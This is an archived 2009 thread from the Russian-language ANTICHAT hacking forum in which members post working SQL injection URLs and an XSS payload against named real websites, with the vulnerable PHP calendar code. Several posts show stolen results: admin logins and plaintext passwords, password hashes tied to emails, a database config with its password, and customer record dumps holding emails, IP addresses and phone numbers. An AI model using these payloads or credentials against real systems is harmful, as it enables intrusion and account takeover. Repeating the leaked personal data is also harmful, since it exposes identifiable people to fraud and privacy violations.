ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.05.2009, 22:37
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://www.armchair.ie/tell_friend.php?id=-1+union+select+1,2,concat_ws(0x3a,ve rsion(),data base(),u ser()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30--
5.0.51a-3ubuntu5.4-log:armchair:armchair@localhost
PR: 2
|
|
|
Xss&Sql-inj в скрипте календаря |
03.05.2009, 22:37
|
|
Banned
Регистрация: 03.05.2009
Сообщений: 8
Провел на форуме:
17814
Репутация:
-59
|
|
Xss&Sql-inj в скрипте календаря
Xss&Sql-inj в скрипте календаря.
2)характерная черта линк вида /news/?_Year=2009&_Month=4&_Day=10
3)news/?_Year=2009&_Month=4'&_Day=10 sql-inj
4)news/?_Year=2009&_Month=4</script><script>alert(/xss/)</script>&_Day=10
cам уязвимый скрипт
Код:
<?
global $DOCUMENT_ROOT;
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];
include "$DOCUMENT_ROOT/manage/inc/all.php";
if (!((isset($_Year)) && (isset($_Month)) && (isset($_Day)) && (isset($id))))
print 'Ошибка календаря';
else
{
$id = content_get_initial($id);
$iface = content_lookup_id($id);
$Months = array ("","is_January", "is_February", "is_March", "is_April", "is_May", "is_June", "is_July", "is_August", "is_September", "is_October", "is_November", "is_December");
$DoDays = array (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$LDoDays = array (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$p_m = $iface->GetPredYM($_Month,$_Year);
$p_m = explode('_',$p_m);
$n_m = $iface->GetNextYM($_Month,$_Year);
$n_m = explode('_',$n_m);
$prev_Month = mktime (0,0,0,$p_m[0], 1, $p_m[1]);
$next_Month = mktime (0,0,0,$n_m[0], 1, $n_m[1]);
//$prev_Month = mktime (0,0,0,$_Month-1, 1, $_Year);
//$next_Month = mktime (0,0,0,$_Month+1, 1, $_Year);
$MaxDay = date("t",mktime (0,0,0,$_Month, 1, $_Year));
$prev_MaxDay = date("t",$prev_Month);
$next_MaxDay = date("t",$next_Month);
$firstYM = explode('-', $iface->GetFirstYM());
$lastYM = explode('-', $iface->GetLastYM());
?>
<div id="months"><?if (!(($_Month==$firstYM[1]) && ($_Year==$firstYM[0]))) {?><a href="#" class="prev" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$prev_Month)?>&_Month='+parseInt(<?=date("m",$prev_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/larr.gif" alt="<-" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?};?><?=$Months[$_Month]." ".$_Year?><?if (!(($_Month==$lastYM[1]) && ($_Year==$lastYM[0]))) {?><a href="#" class="next" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$next_Month)?>&_Month='+parseInt(<?=date("m",$next_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/rarr.gif" alt="->" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?}?></div>
<table>
<tr>
<th>is_PN</th>
<th>is_VT</th>
<th>is_SR</th>
<th>is_CT</th>
<th>is_PT</th>
<th>is_SB</th>
<th>is_VS</th>
</tr>
<?
print '<tr>';
$weekdayfirst = date("w",mktime (0,0,0,$_Month, 1, $_Year));
if ($weekdayfirst=='0')
$weekdayfirst = 7;
$dayweek = $weekdayfirst-1;
$firstdate = $prev_MaxDay - $weekdayfirst+2;
for ($j=$firstdate;$j<=$prev_MaxDay;$j++)
print '<td class="empty">'.$j.'</td>';
for ($i=1;$i<=$MaxDay;$i++)
{
$dayweek=$dayweek+1;
if (($dayweek%7==1) && ($dayweek!=$weekdayfirst))
print '</tr>
<tr>';
if (($i==date("d")) && ($_Month==date("m")) && ($_Year==date("Y")))
{
if (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td class="current"><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td class="current">'.$i.'</td>';
}
elseif (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td>'.$i.'</td>';
}
$j=0;
while ($dayweek%7>=1)
{
$dayweek=$dayweek+1;
$j=$j+1;
print '<td class="empty">'.$j.'</td>';
}
print '</tr>';
?>
</table>
<?
}
?>
Код:
izhevsk.citysvyaz.ru
http://izhevsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=8
http://izhevsk.citysvyaz.ru/info.php
root@localhost
5.0.45-community-nt-log
http://izhevsk.citysvyaz.ru/in2.php
samara.citysvyaz.ru
http://samara.citysvyaz.ru/info.php
http://samara.citysvyaz.ru/news/?_Year=2009&_Month=2+union+select+1,2,user(),version(),5--&_Day=5
gorsvyaz@localhost
5.0.45-community-nt-log
omsk.citysvyaz.ru/
http://omsk.citysvyaz.ru/info.php
http://omsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=17
root@localhost
5.0.45-community-nt-log
nsk.citysvyaz.ru/
http://nsk.citysvyaz.ru/news/?_Year=2009&_Month=3+union+select+1,2,user(),version(),5--&_Day=11
nsk_citysvyaz@212.33.233.190
5.0.32-Debian_7etch8-log
tmn.citysvyaz.ru/
http://tmn.citysvyaz.ru/info.php
http://tmn.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=6
root@localhost
5.0.45-community-nt
chel.citysvyaz.ru/
http://chel.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=5
root@localhost
5.1.19-beta-community-nt-debug
nch.citysvyaz.ru
http://nch.citysvyaz.ru/news/?_Year=2007&_Month=9+union+select+1,2,user(),version(),5--&_Day=26
root@localhost
5.0.45-community-nt
http://iskra.lysva.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),4,5,6,7%20--%20&_Day=11&PHPSESSID=e06ad578342540fd0f4e81c6d63caad3
Последний раз редактировалось [x59]ReV; 03.05.2009 в 22:45..
|
|
|
|
03.05.2009, 23:02
|
|
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070
Репутация:
173
|
|
http://www.uark.edu/ua/wxl02/report.php?trm=-99999+union+select+version(),2,3,4,5,6,7,8--
Database Version: 5.0.75-log
--------------------------------------------------------------------
http://artdesign.calpoly.edu/alumni.php?year=-99999+union+select+1,2,3,4,5,6,7,8,9,concat_ws
(0x3a,user,password),11,12+from+mysql.user--
root:wusthof
--------------------------------------------------------------------
http://nkuconnections.nku.edu/detail.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN +('VwDictionary','dtproperties','sysconstraints',' syssegments','TblAbout','tblBuildingCodes','tblCat egory','TblCustom','TblCustomFields','tblEvents',' tbleventshack','tbleventshack2','TblLog','tblPartI ','tblPartII','tblPartIII','tblPartIV','tblPhotos' ,'tblSchedules','tblSecurity','vwevents','vwListEv ents'))
|
|
|
|
03.05.2009, 23:41
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
халява ТВ (думаю поглумиться с update)
http://www.freetv.fr/tv.php?id=1+union+select+1,2,concat_ws(0x3a,ve rsion(),datab ase(),us er()),4,5,6,7,8,9,10,11,12--
5.0.68-log:freetvsql:freetvsql@10.0.65.48
PR: 2
|
|
|
|
03.05.2009, 23:59
|
|
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309
Репутация:
348
|
|
еще пару шопов...
ec.kyict.com.tw
Код:
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
admin:hi7410
Таблицы:
Код:
Код:
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables/*
Кусок дампа таблицы с юзверями:
Код:
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('1', '1.tw@gmail.com', 'pansy_lai', 'e9f81a5f8c038fe7f5e579024e1ab60e', '', '', '2', '1908-01-01', '0.00', '0.00', '0', '0', '0', '1200871393', '0', '0000-00-00 00:00:00', '', '0', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('2', 'chiaho.tw@gmail.com', 'chiaho', '8ed35021606371c208f2d056c14e020e', '', '', '1', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1146035280', '1200980182', '0000-00-00 00:00:00', '218.210.238.232', '3', '0', '0', '0', '0', '0', '', '', '', '', '', '', '1', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('3', '16888.tw@gmail.com', 'ritakao', '5724cf1a6a973cc01c7cc3890eb04dd5', '', '', '1', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1167017276', '1200965885', '0000-00-00 00:00:00', '218.210.238.232', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('4', '2@yahoo.com.tw', 'shane', 'c7c5399b49dd043c96ed0c0258607e87', '', '', '1', '1989-05-07', '0.00', '0.00', '0', '0', '0', '1200995153', '1200966388', '0000-00-00 00:00:00', '218.210.238.232', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('5', 'suzy@kyict.com.tw', 'suzy', 'fe7cb68d197e9c938caa810d001b76f7', '', '', '2', '1983-05-05', '0.00', '0.00', '0', '0', '0', '1200996685', '1200968007', '0000-00-00 00:00:00', '60.249.120.190', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '1', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('6', 'kevin365007@gmail.com', 'kevin', 'dfdddbbe9c4aebc35385c67b1ed01a0f', '', '', '1', '1970-09-07', '0.00', '0.00', '2500', '2500', '1', '1152815400', '1201122884', '0000-00-00 00:00:00', '60.249.120.182', '2', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('7', 'larrylin819@gmail.com', 'larrylin', 'b96ad5bb2173587d1c6b35ef4977b82e', '', '', '0', '0000-00-00', '0.00', '0.00', '1', '1', '2', '1201162547', '1201230188', '0000-00-00 00:00:00', '59.126.210.220', '2', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('8', 'swaya57@yahoo.com.tw', 'swaya57', '37ffbcbb89a0f03a3e0867341eee9b53', '', '', '0', '0000-00-00', '0.00', '0.00', '1', '1', '0', '1240790468', '1240790468', '0000-00-00 00:00:00', '163.24.24.117', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
АдминкЭ:
Код:
http://ec.kyict.com.tw/admin/index.php
Логин:admin
Пасс:hi7410
ОС: WINDOWS
PR:0
www.mjholly.com
Код:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_name,8%20from%20information_schema.tables/*
config.php
Код:
<?php
// database host
$db_host = "localhost:3306";
// database name
$db_name = "vhost15459-1";
// database username
$db_user = "vhost15459";
// database password
$db_pass = "phoebe";
// table prefix
$prefix = "ecs_";
$timezone = "Asia/Shanghai";
$cookie_path = "/";
$cookie_domain = "";
$admin_dir = "admin";
$session = "1440";
?>
Админ
Код:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
mok579:a4836cd6d94d73eac97cdff2c47aab5f:jerry@mjho lly.com
Юзвери:
Код:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c),8%20from%20ecs_users/*
Кусок дампа из таблицы юзверей:
Код:
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('26', 's2224913@yahoo.com.tw', 's2224913', 'dc7f1d68d86fd5b29b97b342bd91a0ae', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1235846895', '1235846895', '0000-00-00 00:00:00', '58.114.130.16', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('27', 's726162001@yahoo.com.tw', 's726162001', 'cec6ddc2b766c26fd4a9bffd55f45dc7', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1237181260', '1237181260', '0000-00-00 00:00:00', '218.175.56.242', '1', '0', '0', '0', '0', '0', '', 'dodo.0708@hotmail.com', '', '', '', '0939356129', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('28', 'beautiful8barbie@yahoo.com.tw', '蔡沛錞', 'c6158b366eb168d81117331a3c88ab8b', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '10', '1237581695', '1237581695', '0000-00-00 00:00:00', '114.32.139.143', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '0987239628', '0', '0.00');
PR:2 |
|
|
|
04.05.2009, 07:42
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Armand Group
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,database(),user (),version()),4,5,6,7,8,9,10§ion=archive
Код:
u30316_cadillac:u30316@10.10.11.124:5.0.51-log
http://www.armand-chevrolet.ru/company/news/article/?id=19+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15&se ction=new
Код:
u30316_chevrolet:u30316_chevrolet@10.10.11.124:5.0.51-log
http://www.armand-hummer.ru/news/newsitem.php?id=16+and+1=2+union+select+1,2,concat _ws(0x3a,database(),user(),version()),4,5,6,7,8,9, 10§ion=new
Код:
u30316_hummer:u30316@10.10.11.124:5.0.51-log
http://www.armand-opel.ru/company/news/article/?id=15+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15&se ction=new
Код:
u30316_opel:u30316_opel@10.10.11.124:5.0.51-log
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,username,passwo rd,email),4,5,6,7,8,9,10+from+u30316.vb_user+limit +x,1
Код:
Mitridat:8fa28933e324369750ae85d026ba0b8c:galkin@armand.ru
FRM:d47748d5f5aa908c631dcecedfcef3af:frm@armand-group.ru
freemind:237d87b028023a3840331ae2cba2a7fb:freemind01@gmail.com
Екатерина:820ef0cc6e148bbec7f9631338e84ee4:e_kosatkina@armand-premium.ru
tabak72:96f74539d3b453aba888f1f01224509f:tabak72@mail.ru
ulceple:9b0335d4d6ec5b8f046ebf34b128b022:svetlanaleopoldovna@gmail.com
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,hash,access),4, 5,6,7,8,9,10+from+u30316_cad_stat.cns_adminsession s
Код:
13ca4314d25cb955c1228a4393b77c54:admin
|
|
|
|
04.05.2009, 10:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://www.otoplenie.eu/php/firm_profiles.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,data base(),user(),ver sion()),8,9,10,11,12,13,14,15,16,17,18,19,20,21--
otopleni_otoplenie  topleni_otoplen@localhost:5.0. 67-community
------------------------------------------------------------------------
http://travelexpresbg.com/page.php?id=-1+union+select+1,concat_ws(0x3a,dat abase(),u ser(),versi on())--
travelex_te:travelex_te@localhost:5.0.67-community-log
Последний раз редактировалось HAXTA4OK; 04.05.2009 в 10:51..
|
|
|
|
04.05.2009, 10:55
|
|
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497
Репутация:
10
|
|
Продолжаем тему шоп-
Код:
http://www.vostart.com/web/eng/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
|
|
|
|
04.05.2009, 11:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
[PR 4]
Код:
http://www.wedasoft.at/en/product.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.1.15-Debian_0.dotdeb.4-log:wedasoft:wedas@localhost
[PR 3]
Код:
http://zonadostupa.ru/product.php?id=5814+union+select+concat_ws(0x3a,version(),database(),user())
4.1.22-log:wwwzonadostuparu:zonado02@fe30.hc.ru
|
|
|
|
04.05.2009, 12:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://www.arcadi.fr/rendezvous/rv.php?id=-1'+union+select+1,2,concat_ws(0x3a,database(),use r(),versio n()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23/*
arcadi_web2:arcadi_web2@bizmachine8.co.fr.clara.ne t:5.0.33-log
PR: 6
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x59]ReV](/avatars/avatar84385.jpg?1256999){kind=avatar}
Комбинированный вид